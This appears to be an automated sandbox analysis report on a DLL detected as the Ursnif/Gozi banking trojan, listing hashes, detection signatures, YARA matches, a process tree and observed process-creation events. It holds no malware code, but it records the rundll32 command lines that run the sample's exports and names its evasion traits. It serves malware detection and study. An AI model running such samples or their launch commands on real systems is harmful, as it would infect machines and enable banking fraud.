Play interactive tour

Edit tour

Analysis Report n8x3d68Gnd.dll

Overview

General Information

Sample Name:	n8x3d68Gnd.dll
Analysis ID:	433105
MD5:	d5c0bac78e53b46b2fff5e470e98210c
SHA1:	a00da4d379748f9e6f2de1006f10156aa8c36f39
SHA256:	b92289a53611d6f8c078e931c3c5c6ce577e05358bdf54389830e962090991b7
Tags:	dllGoziISFBUrsnif
Infos:
Most interesting Screenshot:

Detection

Ursnif

Score:	56
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Yara detected Ursnif

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Creates a DirectInput object (often for capturing keystrokes)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Found potential string decryption / allocating functions

PE file contains an invalid checksum

Program does not show much activity (idle)

Sample execution stops while process was sleeping (likely an evasion)

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

System is w10x64

loaddll32.exe (PID: 6996 cmdline: loaddll32.exe 'C:\Users\user\Desktop\n8x3d68Gnd.dll' MD5: 542795ADF7CC08EFCF675D65310596E8)

cmd.exe (PID: 7024 cmdline: cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\n8x3d68Gnd.dll',#1 MD5: F3BDBE3BB6F734E357235F4D5898582D)

rundll32.exe (PID: 7064 cmdline: rundll32.exe 'C:\Users\user\Desktop\n8x3d68Gnd.dll',#1 MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

cmd.exe (PID: 7112 cmdline: C:\Windows\system32\cmd.exe /c cd Island MD5: F3BDBE3BB6F734E357235F4D5898582D)

conhost.exe (PID: 4164 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

cmd.exe (PID: 6388 cmdline: C:\Windows\system32\cmd.exe /c cd Matter m MD5: F3BDBE3BB6F734E357235F4D5898582D)

conhost.exe (PID: 4112 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

rundll32.exe (PID: 7052 cmdline: rundll32.exe C:\Users\user\Desktop\n8x3d68Gnd.dll,Connectdark MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

cmd.exe (PID: 7084 cmdline: C:\Windows\system32\cmd.exe /c cd Island MD5: F3BDBE3BB6F734E357235F4D5898582D)

conhost.exe (PID: 7120 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

cmd.exe (PID: 5780 cmdline: C:\Windows\system32\cmd.exe /c cd Matter m MD5: F3BDBE3BB6F734E357235F4D5898582D)

conhost.exe (PID: 6344 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

rundll32.exe (PID: 6044 cmdline: rundll32.exe C:\Users\user\Desktop\n8x3d68Gnd.dll,Mindlake MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

cmd.exe (PID: 3436 cmdline: C:\Windows\system32\cmd.exe /c cd Island MD5: F3BDBE3BB6F734E357235F4D5898582D)

conhost.exe (PID: 4800 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

cmd.exe (PID: 1288 cmdline: C:\Windows\system32\cmd.exe /c cd Matter m MD5: F3BDBE3BB6F734E357235F4D5898582D)

conhost.exe (PID: 2212 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

rundll32.exe (PID: 5772 cmdline: rundll32.exe C:\Users\user\Desktop\n8x3d68Gnd.dll,Porthigh MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

cmd.exe (PID: 5680 cmdline: C:\Windows\system32\cmd.exe /c cd Island MD5: F3BDBE3BB6F734E357235F4D5898582D)

conhost.exe (PID: 4820 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

cmd.exe (PID: 2204 cmdline: C:\Windows\system32\cmd.exe /c cd Matter m MD5: F3BDBE3BB6F734E357235F4D5898582D)

conhost.exe (PID: 6728 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

rundll32.exe (PID: 4728 cmdline: rundll32.exe C:\Users\user\Desktop\n8x3d68Gnd.dll,Problemscale MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

cmd.exe (PID: 6200 cmdline: C:\Windows\system32\cmd.exe /c cd Island MD5: F3BDBE3BB6F734E357235F4D5898582D)

conhost.exe (PID: 6560 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

cmd.exe (PID: 6872 cmdline: C:\Windows\system32\cmd.exe /c cd Matter m MD5: F3BDBE3BB6F734E357235F4D5898582D)

conhost.exe (PID: 6820 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

rundll32.exe (PID: 6208 cmdline: rundll32.exe C:\Users\user\Desktop\n8x3d68Gnd.dll,WingGrass MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

cmd.exe (PID: 6472 cmdline: C:\Windows\system32\cmd.exe /c cd Island MD5: F3BDBE3BB6F734E357235F4D5898582D)

conhost.exe (PID: 6596 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

cmd.exe (PID: 6940 cmdline: C:\Windows\system32\cmd.exe /c cd Matter m MD5: F3BDBE3BB6F734E357235F4D5898582D)

conhost.exe (PID: 6768 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

cmd.exe (PID: 6580 cmdline: C:\Windows\system32\cmd.exe /c cd Island MD5: F3BDBE3BB6F734E357235F4D5898582D)

cmd.exe (PID: 6876 cmdline: C:\Windows\system32\cmd.exe /c cd Matter m MD5: F3BDBE3BB6F734E357235F4D5898582D)

cleanup

Malware Configuration

No configs have been found

Yara Overview

Initial Sample

Source	Rule	Description	Author	Strings
n8x3d68Gnd.dll	JoeSecurity_Ursnif_2	Yara detected Ursnif	Joe Security

Memory Dumps

Source	Rule	Description	Author
00000018.00000002.945736297.000000006D461000.00000020.00020000.sdmp	JoeSecurity_Ursnif_2	Yara detected Ursnif	Joe Security
00000003.00000002.949353578.000000006D461000.00000020.00020000.sdmp	JoeSecurity_Ursnif_2	Yara detected Ursnif	Joe Security
0000000D.00000002.945539240.000000006D461000.00000020.00020000.sdmp	JoeSecurity_Ursnif_2	Yara detected Ursnif	Joe Security
00000002.00000002.962212872.000000006D461000.00000020.00020000.sdmp	JoeSecurity_Ursnif_2	Yara detected Ursnif	Joe Security
00000010.00000002.944163100.000000006D461000.00000020.00020000.sdmp	JoeSecurity_Ursnif_2	Yara detected Ursnif	Joe Security
00000000.00000002.917299629.000000006D461000.00000020.00020000.sdmp	JoeSecurity_Ursnif_2	Yara detected Ursnif	Joe Security
00000015.00000002.921268168.000000006D461000.00000020.00020000.sdmp	JoeSecurity_Ursnif_2	Yara detected Ursnif	Joe Security
Click to see the 2 entries

Unpacked PEs

Source	Rule	Description	Author
0.2.loaddll32.exe.6d460000.0.unpack	JoeSecurity_Ursnif_2	Yara detected Ursnif	Joe Security
3.2.rundll32.exe.6d460000.1.unpack	JoeSecurity_Ursnif_2	Yara detected Ursnif	Joe Security
21.2.rundll32.exe.6d460000.1.unpack	JoeSecurity_Ursnif_2	Yara detected Ursnif	Joe Security
24.2.rundll32.exe.6d460000.1.unpack	JoeSecurity_Ursnif_2	Yara detected Ursnif	Joe Security
13.2.rundll32.exe.6d460000.1.unpack	JoeSecurity_Ursnif_2	Yara detected Ursnif	Joe Security
16.2.rundll32.exe.6d460000.1.unpack	JoeSecurity_Ursnif_2	Yara detected Ursnif	Joe Security
2.2.rundll32.exe.6d460000.1.unpack	JoeSecurity_Ursnif_2	Yara detected Ursnif	Joe Security
Click to see the 2 entries

Sigma Overview

No Sigma rule has matched

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Antivirus / Scanner detection for submitted sample

Show sources

Source: n8x3d68Gnd.dll

Avira: detected

Source: n8x3d68Gnd.dll

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL

Source: n8x3d68Gnd.dll

Static PE information: DYNAMIC_BASE, NX_COMPAT

Source:

Binary string: c:\938\follow-Record\Suffix\observe-element\force.pdb source: loaddll32.exe, 00000000.00000002.917348475.000000006D4EA000.00000002.00020000.sdmp, rundll32.exe, 00000002.00000002.962266346.000000006D4EA000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000002.966549203.000000006D4EA000.00000002.00020000.sdmp, rundll32.exe, 0000000D.00000002.966145648.000000006D4EA000.00000002.00020000.sdmp, rundll32.exe, 00000010.00000002.964938469.000000006D4EA000.00000002.00020000.sdmp, rundll32.exe, 00000015.00000002.921321344.000000006D4EA000.00000002.00020000.sdmp, rundll32.exe, 00000018.00000002.959988796.000000006D4EA000.00000002.00020000.sdmp, n8x3d68Gnd.dll

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Yara detected Ursnif

Show sources

Source: Yara match	File source: n8x3d68Gnd.dll, type: SAMPLE
Source: Yara match	File source: 00000018.00000002.945736297.000000006D461000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.949353578.000000006D461000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.945539240.000000006D461000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.962212872.000000006D461000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.944163100.000000006D461000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.917299629.000000006D461000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000002.921268168.000000006D461000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0.2.loaddll32.exe.6d460000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.rundll32.exe.6d460000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 21.2.rundll32.exe.6d460000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 24.2.rundll32.exe.6d460000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.rundll32.exe.6d460000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.rundll32.exe.6d460000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.rundll32.exe.6d460000.1.unpack, type: UNPACKEDPE

Source: loaddll32.exe, 00000000.00000002.917221171.000000000159B000.00000004.00000020.sdmp

Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

E-Banking Fraud:

Yara detected Ursnif

Show sources

Source: Yara match	File source: n8x3d68Gnd.dll, type: SAMPLE
Source: Yara match	File source: 00000018.00000002.945736297.000000006D461000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.949353578.000000006D461000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.945539240.000000006D461000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.962212872.000000006D461000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.944163100.000000006D461000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.917299629.000000006D461000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000002.921268168.000000006D461000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0.2.loaddll32.exe.6d460000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.rundll32.exe.6d460000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 21.2.rundll32.exe.6d460000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 24.2.rundll32.exe.6d460000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.rundll32.exe.6d460000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.rundll32.exe.6d460000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.rundll32.exe.6d460000.1.unpack, type: UNPACKEDPE

Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6D4A1C3C	0_2_6D4A1C3C
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6D4A3E00	0_2_6D4A3E00
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6D4C84BB	0_2_6D4C84BB
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6D4D67D9	0_2_6D4D67D9
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6D4B5150	0_2_6D4B5150
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6D4BE079	0_2_6D4BE079
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6D4D0396	0_2_6D4D0396
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6D4E02BC	0_2_6D4E02BC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_6D4A1C3C	2_2_6D4A1C3C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_6D4A3E00	2_2_6D4A3E00
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_6D4C84BB	2_2_6D4C84BB
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_6D4D67D9	2_2_6D4D67D9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_6D4B5150	2_2_6D4B5150
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_6D4BE079	2_2_6D4BE079
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_6D4D0396	2_2_6D4D0396
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_6D4E02BC	2_2_6D4E02BC

Source: C:\Windows\System32\loaddll32.exe	Code function: String function: 6D4A0990 appears 34 times
Source: C:\Windows\System32\loaddll32.exe	Code function: String function: 6D4A00AC appears 100 times
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: String function: 6D4A0990 appears 34 times
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: String function: 6D4A00AC appears 100 times

Source: n8x3d68Gnd.dll

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL

Source: classification engine

Classification label: mal56.troj.winDLL@55/0@0/0

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4112:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6344:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6596:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6560:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6820:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4800:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2212:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4820:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4164:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7120:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6728:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6768:120:WilError_01

Source: n8x3d68Gnd.dll

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Windows\System32\loaddll32.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Windows\System32\loaddll32.exe

Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\n8x3d68Gnd.dll,Connectdark

Source: unknown	Process created: C:\Windows\System32\loaddll32.exe loaddll32.exe 'C:\Users\user\Desktop\n8x3d68Gnd.dll'
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\n8x3d68Gnd.dll',#1
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\n8x3d68Gnd.dll,Connectdark
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\n8x3d68Gnd.dll',#1
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c cd Island
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c cd Island
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c cd Matter m
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c cd Matter m
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\n8x3d68Gnd.dll,Mindlake
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c cd Island
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\n8x3d68Gnd.dll,Porthigh
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c cd Island
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c cd Matter m
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\n8x3d68Gnd.dll,Problemscale
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c cd Matter m
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c cd Island
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\n8x3d68Gnd.dll,WingGrass
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c cd Island
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c cd Island
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c cd Matter m
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c cd Matter m
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c cd Matter m
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\n8x3d68Gnd.dll',#1	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\n8x3d68Gnd.dll,Connectdark	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\n8x3d68Gnd.dll,Mindlake	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\n8x3d68Gnd.dll,Porthigh	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\n8x3d68Gnd.dll,Problemscale	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\n8x3d68Gnd.dll,WingGrass	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c cd Island	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c cd Matter m	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\n8x3d68Gnd.dll',#1	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c cd Island	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c cd Matter m	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c cd Island	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c cd Matter m	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c cd Island	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c cd Matter m	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c cd Island	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c cd Matter m	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c cd Island	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c cd Matter m	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c cd Island	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c cd Matter m	Jump to behavior

Source: n8x3d68Gnd.dll	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: n8x3d68Gnd.dll	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: n8x3d68Gnd.dll	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: n8x3d68Gnd.dll	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: n8x3d68Gnd.dll	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: n8x3d68Gnd.dll	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: n8x3d68Gnd.dll

Static PE information: DYNAMIC_BASE, NX_COMPAT

Source: n8x3d68Gnd.dll

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:

Source: n8x3d68Gnd.dll	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: n8x3d68Gnd.dll	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: n8x3d68Gnd.dll	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: n8x3d68Gnd.dll	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: n8x3d68Gnd.dll	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Source: n8x3d68Gnd.dll

Static PE information: real checksum: 0xf3990 should be: 0xf2882

Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6D4A09D6 push ecx; ret	0_2_6D4A09E9
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6D4A0075 push ecx; ret	0_2_6D4A0088
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_6D4A09D6 push ecx; ret	2_2_6D4A09E9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_6D4A0075 push ecx; ret	2_2_6D4A0088

Hooking and other Techniques for Hiding and Protection:

Yara detected Ursnif

Show sources

Source: Yara match	File source: n8x3d68Gnd.dll, type: SAMPLE
Source: Yara match	File source: 00000018.00000002.945736297.000000006D461000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.949353578.000000006D461000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.945539240.000000006D461000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.962212872.000000006D461000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.944163100.000000006D461000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.917299629.000000006D461000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000002.921268168.000000006D461000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0.2.loaddll32.exe.6d460000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.rundll32.exe.6d460000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 21.2.rundll32.exe.6d460000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 24.2.rundll32.exe.6d460000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.rundll32.exe.6d460000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.rundll32.exe.6d460000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.rundll32.exe.6d460000.1.unpack, type: UNPACKEDPE

Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
